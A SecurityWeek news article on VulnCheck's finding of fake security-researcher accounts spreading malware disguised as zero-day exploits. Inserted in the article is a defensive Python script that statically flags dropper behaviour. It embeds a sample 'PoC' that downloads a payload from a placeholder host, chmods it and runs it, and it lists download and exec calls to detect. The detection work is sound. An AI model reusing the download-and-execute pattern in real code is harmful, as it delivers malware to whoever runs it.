Application Security

Fake Security Researcher Accounts Pushing Malware Disguised as Zero-Day Exploits

Fake security researcher accounts seen distributing malware disguised as Chrome, Signal, WhatsApp, Discord and Exchange zero-day exploits.

Exploit and vulnerability intelligence provider VulnCheck has issued a warning over fake security researcher accounts distributing malware disguised as zero-day exploits for popular software. 

The campaign was discovered in early May, when VulnCheck came across a GitHub repository hosting code that its author claimed to be a zero-day for the Signal messaging application. 

Throughout May, the cybersecurity firm continued finding such accounts on GitHub, offering what they claimed to be zero-day exploits for applications such as WhatsApp, Chrome, Discord, and Microsoft Exchange.

More recently, VulnCheck noticed that the campaign’s operator has also started creating Twitter accounts that appear to belong to security researchers and using them to lure people to GitHub repositories hosting the fake zero-day exploits.

The fake researcher accounts on Twitter have profile pictures — in some cases they are the photos of known researchers — and they claim to be associated with High Sierra Cyber Security, an entity that does not seem to exist. 

The code hosted in the GitHub repositories is designed to download a malicious binary and execute it. The downloaded binary can be a Windows or Linux file, depending on the victim’s operating system. A brief analysis of these binaries makes it obvious that they are malware.  
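The pattern described above (a "proof of concept" that fetches a binary, picks a payload by operating system, and executes it) is easy to spot before anything is run. The following static triage script is an added example, not VulnCheck's or SecurityWeek's code, and it does not reflect any specific repository from the campaign. It parses a Python PoC with the `ast` module and reports network fetches, OS branching, permission changes and process execution. The embedded sample PoC is constructed for the demo, its URLs are placeholders, and it is only parsed, never executed.

```python
"""Static triage of a downloaded proof-of-concept script before anyone runs it.

Added example. It flags the dropper shape described in the article: a "PoC"
that downloads a binary, chooses it by operating system, and executes it.
Only dotted names (module.function) are matched; a script that does
`from subprocess import run` evades this check, so treat a clean result as
"no indicators found", not as "safe".
"""
import ast
from dataclasses import dataclass

# Dotted call names grouped by what they do. Constructed, not exhaustive.
DOWNLOAD = {"urllib.request.urlretrieve", "urllib.request.urlopen",
            "requests.get", "urllib2.urlopen"}
EXECUTE = {"subprocess.run", "subprocess.Popen", "subprocess.call",
           "subprocess.check_output", "os.system", "os.startfile",
           "os.execv", "os.execvp"}
PERMISSION = {"os.chmod"}
# OS checks appear as attribute reads, with or without a call.
OS_CHECK = {"platform.system", "platform.platform", "sys.platform", "os.name"}


@dataclass(frozen=True)
class Finding:
    category: str   # download | execute | permission | os_check
    name: str       # dotted name that matched
    line: int       # line in the analysed script


def _dotted(node: ast.AST):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> list[Finding]:
    """Parse `source` (never executed) and collect dropper indicators."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            for category, names in (("download", DOWNLOAD),
                                     ("execute", EXECUTE),
                                     ("permission", PERMISSION)):
                if name in names:
                    findings.append(Finding(category, name, node.lineno))
        elif isinstance(node, ast.Attribute):
            # platform.system() is seen here once, via its Attribute node,
            # so it is not double-counted with the Call branch above.
            name = _dotted(node)
            if name in OS_CHECK:
                findings.append(Finding("os_check", name, node.lineno))
    return sorted(findings, key=lambda f: f.line)


def verdict(findings: list[Finding]) -> str:
    """Summarise the findings for the person about to run the script."""
    cats = {f.category for f in findings}
    if {"download", "execute"} <= cats:
        return "download-and-execute pattern: treat as a dropper, do not run"
    if cats & {"download", "execute"}:
        return "network or process activity present: review before running"
    return "no network/exec indicators (static check only)"


# Constructed sample mimicking the shape described in the article. The
# URLs are placeholders and this text is only ever handed to ast.parse().
SAMPLE_POC = '''
import platform, subprocess, urllib.request, os

# "exploit" that never touches the claimed target: it just stages a payload
if platform.system() == "Windows":
    url, dst = "https://example.invalid/payload.exe", "poc.exe"
else:
    url, dst = "https://example.invalid/payload", "./poc"
urllib.request.urlretrieve(url, dst)
os.chmod(dst, 0o755)
subprocess.run([dst])
'''

if __name__ == "__main__":
    for f in triage(SAMPLE_POC):
        print(f"line {f.line:>3}  {f.category:<10} {f.name}")
    print(verdict(triage(SAMPLE_POC)))
```

Run it on the sample and it reports the OS check, the download, the chmod and the execution on separate lines, then the "do not run" verdict; a benign script that only builds packet bytes with `struct` yields no findings. The check is deliberately shallow: it is a first gate for a repository of unknown provenance, to be followed by reading the code and running it only in a disposable sandbox.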

“The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful,” VulnCheck said.

The GitHub accounts seen by VulnCheck have been suspended, but the fake Twitter accounts are still online at the time of writing.

It’s unclear if this is a campaign run by a threat actor or if it’s part of some sort of experiment, but the cybersecurity community has been advised to act with caution when executing code from untrusted sources.  

Sophisticated threat actors targeting security researchers is not unheard of. In 2021, Google warned that North Korean hackers had delivered malware to security researchers after gaining their trust. 

Research conducted recently by Leiden University showed that GitHub hosted hundreds of malicious repositories advertised as proof-of-concept (PoC) exploits. 

Related: South American Cyberspies Impersonate Colombian Government in Recent Campaign

Related: Iranian APT Leaks Data From Saudi Arabia Government Under New Persona

Related: Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
